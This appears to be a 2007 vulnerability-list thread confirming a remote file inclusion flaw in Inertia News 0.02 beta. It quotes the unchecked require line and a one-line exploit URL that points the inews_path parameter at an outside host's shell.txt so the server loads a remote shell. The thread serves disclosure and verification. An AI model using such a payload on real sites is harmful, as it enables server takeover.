[VIM] true: Inertia News Remote File İnclude
str0ke
str0ke at milw0rm.com
Tue Feb 13 09:06:45 EST 2007
This was posted up on 12/21/2006.
http://www.milw0rm.com/exploits/2976
/str0ke
On 2/13/07, Noam Rathaus <noamr at beyondsecurity.com> wrote:
> Hi,
>
> It looks legit:
>
> <snip>
> require ("$inews_path/inertia_sql_class.php");
> </snip>
>
> No tests done to the value.
>
> Product looks like abandon ware (http://www.brentc.com/inertianews/).
>
> ---------- Forwarded Message ----------
>
> Subject: Inertia News Remote File İnclude
> Date: Monday 12 February 2007 22:55
> From: crazy_king at eno7.org
> To: bugtraq at securityfocus.com
>
> Version :
> 0.02 beta
>
> Error :
> require ("$inews_path/inertia_sql_class.php");
>
> Exploit :
> http://www.victim.com/inertianews_main.php?inews_path=http://www.site.com/sh
> ell.txt
>
> Eno7.Org - Crazy-King.ORg
>
> Thanks : Apaci & Erne & Eno7 & Tamturk & UyussMan & Ayyıldız Tim
>
> -------------------------------------------------------
>
> --
> Noam Rathaus
> CTO
> 1616 Anderson Rd.
> McLean, VA 22102
> Tel: 703.286.7725 extension 105
> Fax: 888.667.7740
> noamr at beyondsecurity.com
> http://www.beyondsecurity.com
>
More information about the VIM
mailing list